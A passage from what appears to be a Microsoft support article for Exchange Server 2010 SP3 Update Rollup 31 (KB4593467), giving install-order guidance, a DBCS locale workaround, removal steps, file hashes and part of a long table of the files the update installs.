\n\n__\n\nInstall the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying\n\nIf your scenario meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:\n\n * You're a CAS Proxy Deployment Guidance customer.\n * You have deployed [CAS-CAS proxying](<http://technet.microsoft.com/library/bb310763\\(exchg.140\\).aspx>).\n**Note **For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.\n\n## \n\n__\n\nInstall this update on a DBCS version of Windows Server 2012\n\nYou can't install or uninstall Update Rollup 31 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:\n\n 1. In Control Panel, select **Clock, Region and Language**, select **Region**, and then select **Administrative**.\n 2. In the **Language for non-Unicode programs** area, select **Change system locale**.\n 3. In the **Current system locale** list, select **English (United States)**, and then select **OK**.\nAfter you successfully install or uninstall Update Rollup 31, revert this language setting, as appropriate.\n\nRestart requirementThe required services are restarted automatically after you apply this update rollup.Removal informationTo remove Update Rollup 31 for Exchange Server 2010 SP3, use the **Add or Remove Programs** item in Control Panel to remove update **KB4593467**.More informationSecurity update deployment informationFor deployment information about this update, see [security update deployment information: December 8, 2020](<https://support.microsoft.com/help/20201208>). Security update replacement informationThis security update replaces the following previously released update:\n\n * Description of the security update for Microsoft Exchange Server 2010: February 11, 2020\nFile informationFile hash informationUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nUpdate Rollup 31 for Exchange Server 2010| Exchange2010-KB4593467-x64-en.msp| 3F41A2ECD7AFB248239C8EF7588D28AE0FE2D3A8| 4B39046903D6D1D0350F503D4EA291487D2661C64880EBC0CC247EB2D8184C74 \n \nExchange Server file informationThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nUpdate Rollup 31 for Exchange Server 2010\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nA33e7066a3f143ef8386e08c4458051d_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nAbv_dg.dll| 14.3.509.0| 891,800| 11-Nov-2020| 21:20| x64 \nAddreplicatopfrecursive.ps1| Not applicable| 16,001| 11-Nov-2020| 21:21| Not applicable \nAddressbook.aspx| Not applicable| 3,830| 11-Nov-2020| 21:23| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 15,637| 11-Nov-2020| 21:21| Not applicable \nAf46d2bd14db43e0b49619bd0eeb07ec_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nAggregatepfdata.ps1| Not applicable| 19,565| 11-Nov-2020| 21:21| Not applicable \nAirfilter.dll| 14.3.498.0| 42,384| 11-Nov-2020| 21:22| x64 \nAirsynctistateparser.dll| 14.3.498.0| 76,184| 11-Nov-2020| 21:22| x64 \nAjaxcontroltoolkit.dll| 14.3.498.0| 103,368| 11-Nov-2020| 21:22| x86 \nAlsperf.dll1| 14.3.498.0| 20,376| 11-Nov-2020| 21:20| Not applicable \nAntispamcommon.ps1| Not applicable| 13,893| 11-Nov-2020| 21:20| Not applicable \nAsdat.msi| Not applicable| 5,079,040| 11-Nov-2020| 21:20| Not applicable \nAsentirs.msi| Not applicable| 69,632| 11-Nov-2020| 21:25| Not applicable \nAsentsig.msi| Not applicable| 69,632| 11-Nov-2020| 21:25| Not applicable \nAttachfiledialog.aspx| Not applicable| 5,346| 11-Nov-2020| 21:23| Not applicable \nAutodisc_web.config| Not applicable| 89,637| 11-Nov-2020| 21:24| Not applicable \nBasicaddressbook.aspx| Not applicable| 4,217| 11-Nov-2020| 21:23| Not applicable \nBasicattachmentmanager.aspx| Not applicable| 3,826| 11-Nov-2020| 21:23| Not applicable \nBasicautosaveinfo.aspx| Not applicable| 4,255| 11-Nov-2020| 21:23| Not applicable \nBasiccalendaritemschedulingtab.aspx| Not applicable| 6,908| 11-Nov-2020| 21:23| Not applicable \nBasiccalendarview.aspx| Not applicable| 3,259| 11-Nov-2020| 21:23| Not applicable \nBasiccontactview.aspx| Not applicable| 3,586| 11-Nov-2020| 21:23| Not applicable \nBasiccontactviewwebpart.aspx| Not applicable| 2,485| 11-Nov-2020| 21:24| Not applicable \nBasiceditcalendaritem.aspx| Not applicable| 17,517| 11-Nov-2020| 21:23| Not applicable \nBasiceditcontact.aspx| Not applicable| 6,356| 11-Nov-2020| 21:23| Not applicable \nBasiceditmeetingresponse.aspx| Not applicable| 11,664| 11-Nov-2020| 21:23| Not applicable \nBasiceditmessage.aspx| Not applicable| 8,801| 11-Nov-2020| 21:23| Not applicable \nBasiceditrecurrence.aspx| Not applicable| 14,645| 11-Nov-2020| 21:23| Not applicable \nBasicfoldermanagement.aspx| Not applicable| 3,630| 11-Nov-2020| 21:23| Not applicable \nBasicmeetingpage.aspx| Not applicable| 12,659| 11-Nov-2020| 21:23| Not applicable \nBasicmessageview.aspx| Not applicable| 4,084| 11-Nov-2020| 21:23| Not applicable \nBasicmessageviewwebpart.aspx| Not applicable| 2,625| 11-Nov-2020| 21:24| Not applicable \nBasicmoveitem.aspx| Not applicable| 4,112| 11-Nov-2020| 21:23| Not applicable \nBasicoptions.aspx| Not applicable| 3,506| 11-Nov-2020| 21:23| Not applicable \nBasicreadaddistributionlist.aspx| Not applicable| 4,364| 11-Nov-2020| 21:24| Not applicable \nBasicreadadorgperson.aspx| Not applicable| 4,434| 11-Nov-2020| 21:24| Not applicable \nBasicreadcontact.aspx| Not applicable| 4,406| 11-Nov-2020| 21:24| Not applicable \nBasicreaddistributionlist.aspx| Not applicable| 4,864| 11-Nov-2020| 21:24| Not applicable \nBasicreadmessage.aspx| Not applicable| 7,071| 11-Nov-2020| 21:24| Not applicable \nBpa.common.dll| 14.3.509.0| 226,288| 11-Nov-2020| 21:23| x86 \nBpa.configcollector.dll| 14.3.509.0| 119,776| 11-Nov-2020| 21:23| x86 \nBpa.networkcollector.dll| 14.3.498.0| 62,648| 11-Nov-2020| 21:23| x86 \nBpa.userinterface.dll| 14.3.509.0| 529,384| 11-Nov-2020| 21:23| x86 \nBpa.wizardengine.dll| 14.3.509.0| 127,968| 11-Nov-2020| 21:23| x86 \nBsres.dll| 14.3.498.0| 85,448| 11-Nov-2020| 21:21| x64 \nC3197ef34a9e495cb17370b20389036a_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nC4f748eeabe04db79b17bab56b1285a4_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nCalcalculation.ps1| Not applicable| 31,968| 11-Nov-2020| 21:21| Not applicable \nCaptedt.js| Not applicable| 11,208| 11-Nov-2020| 21:20| Not applicable \nCasredirect.aspx| Not applicable| 4,842| 11-Nov-2020| 21:23| Not applicable \nCb8b92743d7f42a7b8e53fe033206469_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 82,351| 11-Nov-2020| 21:21| Not applicable \nCheckinvalidrecipients.ps1| Not applicable| 23,085| 11-Nov-2020| 21:21| Not applicable \nChksgfiles.dll| 14.3.498.0| 57,792| 11-Nov-2020| 21:20| x64 \nCitsconstants.ps1| Not applicable| 19,383| 11-Nov-2020| 21:23| Not applicable \nCitslibrary.ps1| Not applicable| 171,571| 11-Nov-2020| 21:23| Not applicable \nCitstypes.ps1| Not applicable| 16,668| 11-Nov-2020| 21:23| Not applicable \nClusmsg.dll| 14.3.498.0| 103,528| 11-Nov-2020| 21:23| x64 \nCmmap000.bin| Not applicable| 381,737| 11-Nov-2020| 21:24| Not applicable \nCmn.js| Not applicable| 7,356| 11-Nov-2020| 21:20| Not applicable \nCobrandingdiagnostics.aspx| Not applicable| 1,649| 11-Nov-2020| 21:23| Not applicable \nCollectovermetrics.ps1| Not applicable| 79,697| 11-Nov-2020| 21:21| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,970| 11-Nov-2020| 21:21| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,707| 11-Nov-2020| 21:19| Not applicable \nConfigureadam.ps1| Not applicable| 23,347| 11-Nov-2020| 21:21| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,046| 11-Nov-2020| 21:21| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,865| 11-Nov-2020| 21:21| Not applicable \nConnectfunctions.ps1| Not applicable| 35,068| 11-Nov-2020| 21:21| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,902| 11-Nov-2020| 21:21| Not applicable \nConsoleinitialize.ps1| Not applicable| 26,381| 11-Nov-2020| 21:19| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,093| 11-Nov-2020| 21:21| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,572| 11-Nov-2020| 21:21| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCtsvw.js| Not applicable| 1,982| 11-Nov-2020| 21:20| Not applicable \nCts_exsmime.dll| 14.3.498.0| 312,720| 11-Nov-2020| 21:19| x64 \nCts_microsoft.exchange.data.common.dll| 14.3.498.0| 1,541,280| 11-Nov-2020| 21:19| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 11-Nov-2020| 21:22| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 14.3.498.0| 13,472| 11-Nov-2020| 21:19| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 14.3.498.0| 13,264| 11-Nov-2020| 21:19| x86 \nDaddrbk.js| Not applicable| 5,533| 11-Nov-2020| 21:20| Not applicable \nDagcommonlibrary.ps1| Not applicable| 49,810| 11-Nov-2020| 21:21| Not applicable \nDattach.js| Not applicable| 2,597| 11-Nov-2020| 21:20| Not applicable \nDess.dll| 8.5.3.76| 202,080| 11-Nov-2020| 21:24| x64 \nDevect.dll| 8.5.3.76| 1,883,488| 11-Nov-2020| 21:24| x64 \nDewp.dll| 8.5.3.76| 294,240| 11-Nov-2020| 21:24| x64 \nDf9d06af701642c98d336e7d2e95781c_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nDiagnosticcmdletcontroller.dll| 14.3.509.0| 40,344| 11-Nov-2020| 21:20| x64 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 14,868| 11-Nov-2020| 21:23| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,402| 11-Nov-2020| 21:21| Not applicable \nDisable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 11-Nov-2020| 21:22| Not applicable \nDsaccess.dll| 14.3.498.0| 834,968| 11-Nov-2020| 21:20| x64 \nDsaccessperf.dll| 14.3.498.0| 46,480| 11-Nov-2020| 21:19| x64 \nDscperf.dll| 14.3.498.0| 24,464| 11-Nov-2020| 21:19| x64 \nDup_cts_microsoft.exchange.data.common.dll| 14.3.498.0| 1,541,280| 11-Nov-2020| 21:19| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 14.3.498.0| 328,808| 11-Nov-2020| 21:20| x86 \nEcpperfcounters.xml| Not applicable| 30,668| 11-Nov-2020| 21:22| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:19| x86 \nEdgetransport.exe| 14.3.498.0| 29,080| 11-Nov-2020| 21:22| x86 \nEditorstandalone.js| Not applicable| 298,514| 11-Nov-2020| 21:20| Not applicable \nEdittask.aspx| Not applicable| 11,565| 11-Nov-2020| 21:23| Not applicable \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 11-Nov-2020| 21:22| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:20| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:20| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,216| 11-Nov-2020| 21:19| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:19| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 14.3.498.0| 13,416| 11-Nov-2020| 21:20| x86 \nEf306e728a08437e80fe5a896ded4b48_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nEnableinmemorytracing.ps1| Not applicable| 13,404| 11-Nov-2020| 21:21| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,638| 11-Nov-2020| 21:21| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 28,949| 11-Nov-2020| 21:21| Not applicable \nEnable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 11-Nov-2020| 21:22| Not applicable \nEscprint.dll| 14.3.498.0| 21,144| 11-Nov-2020| 21:23| x64 \nEse.dll| 14.3.498.0| 3,218,832| 11-Nov-2020| 21:19| x64 \nEseback2.dll| 14.3.498.0| 163,728| 11-Nov-2020| 21:22| x64 \nEsebcli2.dll| 14.3.498.0| 111,504| 11-Nov-2020| 21:22| x64 \nEseperf.dll| 14.3.498.0| 56,424| 11-Nov-2020| 21:22| x64 \nEseutil.exe| 14.3.498.0| 321,424| 11-Nov-2020| 21:22| x64 \nEsevss.dll| 14.3.498.0| 49,560| 11-Nov-2020| 21:22| x64 \nExabp.dll| 14.3.509.0| 259,480| 11-Nov-2020| 21:22| x64 \nExbpa.config.xml| Not applicable| 1,152,177| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.clientaccess.xml| Not applicable| 19,829| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.global.xml| Not applicable| 20,227| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.mailbox.xml| Not applicable| 85,892| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.transport.xml| Not applicable| 27,431| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.unifiedmessaging.xml| Not applicable| 22,083| 11-Nov-2020| 21:23| Not applicable \nExbpa.e12.xml| Not applicable| 22,158| 11-Nov-2020| 21:23| Not applicable \nExbpa.esecollector.dll| 14.3.498.0| 95,400| 11-Nov-2020| 21:23| x86 \nExbpa.exchangecollector.dll| 14.3.498.0| 22,480| 11-Nov-2020| 21:23| x86 \nExbpa.exe| 14.3.498.0| 70,816| 11-Nov-2020| 21:20| x86 \nExbpa.permissions.xml| Not applicable| 97,181| 11-Nov-2020| 21:23| Not applicable \nExbpa.prereqs.xml| Not applicable| 224,325| 11-Nov-2020| 21:23| Not applicable \nExbpa.rbac.xml| Not applicable| 43,481| 11-Nov-2020| 21:23| Not applicable \nExbpa.readiness.xml| Not applicable| 73,038| 11-Nov-2020| 21:23| Not applicable \nExbpa.shared.dll| 14.3.498.0| 124,064| 11-Nov-2020| 21:23| x86 \nExbpa.stayinginformed.config.xml| Not applicable| 44,999| 11-Nov-2020| 21:21| Not applicable \nExbpa.transport.xml| Not applicable| 39,023| 11-Nov-2020| 21:23| Not applicable \nExbpacmd.exe| 14.3.498.0| 21,968| 11-Nov-2020| 21:23| x86 \nExbpamdb.dll| 14.3.509.0| 17,816| 11-Nov-2020| 21:23| x64 \nExbpamon.dll| 14.3.498.0| 115,608| 11-Nov-2020| 21:23| x64 \nExchange.format.ps1xml| Not applicable| 265,654| 11-Nov-2020| 21:21| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 21,607| 11-Nov-2020| 21:21| Not applicable \nExchange.ps1| Not applicable| 21,480| 11-Nov-2020| 21:19| Not applicable \nExchange.support.format.ps1xml| Not applicable| 25,477| 11-Nov-2020| 21:21| Not applicable \nExchange.types.ps1xml| Not applicable| 363,600| 11-Nov-2020| 21:21| Not applicable \nExchangeblog.xml| Not applicable| 120,788| 11-Nov-2020| 21:21| Not applicable \nExchmem.dll| 14.3.498.0| 64,408| 11-Nov-2020| 21:19| x64 \nExchsetupmsg.dll| 14.3.498.0| 12,688| 11-Nov-2020| 21:21| x64 \nExchucutil.ps1| Not applicable| 23,695| 11-Nov-2020| 21:21| Not applicable \nExdbfailureitemapi.dll| 14.3.498.0| 58,264| 11-Nov-2020| 21:22| x64 \nExdbmsg.dll| 14.3.498.0| 148,376| 11-Nov-2020| 21:23| x64 \nExfba.exe| 14.3.509.0| 103,816| 11-Nov-2020| 21:24| x64 \nExgdsf.dll| 8.5.3.76| 16,224| 11-Nov-2020| 21:24| x64 \nExhtml.dll| 8.5.3.76| 640,352| 11-Nov-2020| 21:24| x64 \nExmfa.config.xml| Not applicable| 875,486| 11-Nov-2020| 21:23| Not applicable \nExmime.dll| 14.3.498.0| 332,696| 11-Nov-2020| 21:19| x64 \nExpiredpassword.aspx| Not applicable| 7,226| 11-Nov-2020| 21:24| Not applicable \nExportedgeconfig.ps1| Not applicable| 27,430| 11-Nov-2020| 21:21| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,548| 11-Nov-2020| 21:20| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,080| 11-Nov-2020| 21:21| Not applicable \nExppw.dll| 14.3.498.0| 66,448| 11-Nov-2020| 21:24| x64 \nExprfdll.dll| 14.3.498.0| 26,008| 11-Nov-2020| 21:20| x64 \nExpta.config.xml| Not applicable| 559,313| 11-Nov-2020| 21:23| Not applicable \nExpta.e12.collection.xml| Not applicable| 228,414| 11-Nov-2020| 21:23| Not applicable \nExrdrlbs.dll| 14.3.498.0| 24,008| 11-Nov-2020| 21:21| x64 \nExrpc32.dll| 14.3.509.0| 1,658,768| 11-Nov-2020| 21:22| x64 \nExrw.dll| 14.3.498.0| 28,056| 11-Nov-2020| 21:22| x64 \nExsetdata.dll| 14.3.509.0| 1,804,696| 11-Nov-2020| 21:19| x64 \nExsetup.exe| 14.3.509.0| 41,968| 11-Nov-2020| 21:21| x86 \nExsetupui.exe| 14.3.498.0| 254,872| 11-Nov-2020| 21:21| x86 \nExtra.config.xml| Not applicable| 36,393| 11-Nov-2020| 21:23| Not applicable \nExtra.exe| 14.3.498.0| 123,848| 11-Nov-2020| 21:23| x86 \nExtrace.dll| 14.3.498.0| 163,432| 11-Nov-2020| 21:22| x64 \nExtraceman.config.xml| Not applicable| 89,064| 11-Nov-2020| 21:23| Not applicable \nExtraceman.dll| 14.3.509.0| 62,440| 11-Nov-2020| 21:23| x86 \nExt_microsoft.exchange.data.transport.dll| 14.3.498.0| 328,808| 11-Nov-2020| 21:19| x86 \nExwriter.dll| 14.3.509.0| 538,008| 11-Nov-2020| 21:23| x64 \nFadcnt.js| Not applicable| 5,192| 11-Nov-2020| 21:20| Not applicable \nFedtcali.js| Not applicable| 110,582| 11-Nov-2020| 21:20| Not applicable \nFedtrul.js| Not applicable| 30,339| 11-Nov-2020| 21:20| Not applicable \nFixed.skin| Not applicable| 12,879| 11-Nov-2020| 21:22| Not applicable \nFlogon.js| Not applicable| 4,296| 11-Nov-2020| 21:20| Not applicable \nFreadmsg.js| Not applicable| 13,127| 11-Nov-2020| 21:20| Not applicable \nGalgrammargenerator.exe| 14.3.498.0| 20,888| 11-Nov-2020| 21:23| x86 \nGetdatabaseforsearchindex.ps1| Not applicable| 15,621| 11-Nov-2020| 21:21| Not applicable \nGetsearchindexfordatabase.ps1| Not applicable| 15,545| 11-Nov-2020| 21:21| Not applicable \nGetucpool.ps1| Not applicable| 19,792| 11-Nov-2020| 21:21| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 16,197| 11-Nov-2020| 21:23| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 15,043| 11-Nov-2020| 21:23| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 16,115| 11-Nov-2020| 21:23| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 15,163| 11-Nov-2020| 21:23| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,582| 11-Nov-2020| 21:23| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,789| 11-Nov-2020| 21:23| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 15,194| 11-Nov-2020| 21:23| Not applicable \nGet_setuplog.ps1| Not applicable| 17,406| 11-Nov-2020| 21:19| Not applicable \nGet_setuplog_help.xml| Not applicable| 23,651| 11-Nov-2020| 21:21| Not applicable \nGoogle.protocolbuffers.dll| 2.4.1.521| 325,504| 11-Nov-2020| 21:24| x86 \nGradienth.png| Not applicable| 118| 11-Nov-2020| 21:20| Not applicable \nHuffman_xpress.dll| 14.3.498.0| 33,176| 11-Nov-2020| 21:22| x64 \nIbfpx2.dll| 8.5.3.76| 145,760| 11-Nov-2020| 21:24| x64 \nIbgp42.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64 \nIbjpg2.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64 \nIbpcd2.dll| 8.5.3.76| 171,872| 11-Nov-2020| 21:24| x64 \nIbpsd2.dll| 8.5.3.76| 42,336| 11-Nov-2020| 21:24| x64 \nIbxbm2.dll| 8.5.3.76| 35,680| 11-Nov-2020| 21:24| x64 \nIbxpm2.dll| 8.5.3.76| 67,936| 11-Nov-2020| 21:24| x64 \nIbxwd2.dll| 8.5.3.76| 37,728| 11-Nov-2020| 21:24| x64 \nIm.js| Not applicable| 54,992| 11-Nov-2020| 21:20| Not applicable \nImcd32.dll| 8.5.3.76| 123,744| 11-Nov-2020| 21:24| x64 \nImcd42.dll| 8.5.3.76| 142,688| 11-Nov-2020| 21:24| x64 \nImcd52.dll| 8.5.3.76| 144,736| 11-Nov-2020| 21:24| x64 \nImcd62.dll| 8.5.3.76| 159,072| 11-Nov-2020| 21:24| x64 \nImcd72.dll| 8.5.3.76| 279,392| 11-Nov-2020| 21:24| x64 \nImcd82.dll| 8.5.3.76| 279,392| 11-Nov-2020| 21:24| x64 \nImcdr2.dll| 8.5.3.76| 73,056| 11-Nov-2020| 21:24| x64 \nImcm52.dll| 8.5.3.76| 63,840| 11-Nov-2020| 21:24| x64 \nImcm72.dll| 8.5.3.76| 117,088| 11-Nov-2020| 21:24| x64 \nImcmx2.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64 \nImdsf2.dll| 8.5.3.76| 168,288| 11-Nov-2020| 21:24| x64 \nImfmv2.dll| 8.5.3.76| 67,424| 11-Nov-2020| 21:24| x64 \nImgdf2.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64 \nImgem2.dll| 8.5.3.76| 56,672| 11-Nov-2020| 21:24| x64 \nImigs2.dll| 8.5.3.76| 117,088| 11-Nov-2020| 21:24| x64 \nImmet2.dll| 8.5.3.76| 167,264| 11-Nov-2020| 21:24| x64 \nImpif2.dll| 8.5.3.76| 71,008| 11-Nov-2020| 21:24| x64 \nImportedgeconfig.ps1| Not applicable| 79,784| 11-Nov-2020| 21:21| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,975| 11-Nov-2020| 21:21| Not applicable \nImpsi2.dll| 8.5.3.76| 2,031,968| 11-Nov-2020| 21:24| x64 \nImpsz2.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nImps_2.dll| 8.5.3.76| 124,256| 11-Nov-2020| 21:24| x64 \nImrnd2.dll| 8.5.3.76| 38,752| 11-Nov-2020| 21:24| x64 \nInfo.aspx| Not applicable| 3,447| 11-Nov-2020| 21:23| Not applicable \nInproxy.dll| 14.3.498.0| 88,472| 11-Nov-2020| 21:19| x64 \nInstallwindowscomponent.ps1| Not applicable| 27,225| 11-Nov-2020| 21:21| Not applicable \nInstall_antispamagents.ps1| Not applicable| 16,708| 11-Nov-2020| 21:23| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 119,712| 11-Nov-2020| 21:25| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 20,384| 11-Nov-2020| 21:25| Not applicable \nInterop.certenroll.dll| 14.3.498.0| 148,384| 11-Nov-2020| 21:23| x64 \nInterop.migbase.dll| 14.3.509.0| 50,152| 11-Nov-2020| 21:20| x86 \nInterop.netfw.dll| 14.3.498.0| 41,880| 11-Nov-2020| 21:20| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.498.0| 26,016| 11-Nov-2020| 21:25| Not applicable \nInterop.wuapilib.dll| 14.3.498.0| 70,552| 11-Nov-2020| 21:25| x86 \nInterop.xenroll.dll| 14.3.498.0| 50,072| 11-Nov-2020| 21:20| x64 \nIphgw2.dll| 8.5.3.76| 222,048| 11-Nov-2020| 21:24| x64 \nIsgdi32.dll| 8.5.3.76| 1,406,312| 11-Nov-2020| 21:24| x64 \nIsinteg.exe| 14.3.509.0| 449,432| 11-Nov-2020| 21:23| x64 \nKerbauth.dll| 14.3.498.0| 62,352| 11-Nov-2020| 21:22| x64 \nLanguageselection.aspx| Not applicable| 5,421| 11-Nov-2020| 21:23| Not applicable \nLargetoken_iis_ews.ps1| Not applicable| 21,795| 11-Nov-2020| 21:21| Not applicable \nLargetoken_kerberos.ps1| Not applicable| 16,042| 11-Nov-2020| 21:21| Not applicable \nLogoff.aspx| Not applicable| 6,067| 11-Nov-2020| 21:24| Not applicable \nLogon.aspx| Not applicable| 13,479| 11-Nov-2020| 21:24| Not applicable \nLpsetupui.exe| 14.3.498.0| 234,400| 11-Nov-2020| 21:21| x86 \nLpversioning.xml| Not applicable| 18,977| 11-Nov-2020| 21:21| Not applicable \nMad.exe| 14.3.509.0| 1,364,360| 11-Nov-2020| 21:19| x64 \nMadmsg.dll| 14.3.498.0| 101,272| 11-Nov-2020| 21:19| x64 \nMailboxdatabasereseedusingspares.ps1| Not applicable| 40,993| 11-Nov-2020| 21:21| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,869| 11-Nov-2020| 21:21| Not applicable \nMapiprotocolhandlerstub.dll| 14.3.498.0| 74,640| 11-Nov-2020| 21:22| x64 \nMdbevent.dll| 14.3.509.0| 492,944| 11-Nov-2020| 21:23| x64 \nMdbmsg.dll| 14.3.498.0| 224,712| 11-Nov-2020| 21:20| x64 \nMdbperf.dll| 14.3.509.0| 468,376| 11-Nov-2020| 21:25| x64 \nMdbperf.ini| Not applicable| 724,818| 11-Nov-2020| 21:20| Not applicable \nMdbperfx.dll| 14.3.509.0| 468,888| 11-Nov-2020| 21:25| x64 \nMdbrest.dll| 14.3.509.0| 697,752| 11-Nov-2020| 21:23| x64 \nMdbsz.dll| 14.3.509.0| 49,560| 11-Nov-2020| 21:23| x64 \nMdbtask.dll| 14.3.509.0| 448,408| 11-Nov-2020| 21:23| x64 \nMeetingpage.aspx| Not applicable| 12,927| 11-Nov-2020| 21:23| Not applicable \nMessages.xsd| Not applicable| 21,147| 11-Nov-2020| 21:24| Not applicable \nMicrosoft.dkm.proxy.dll| 14.3.498.0| 38,048| 11-Nov-2020| 21:22| x86 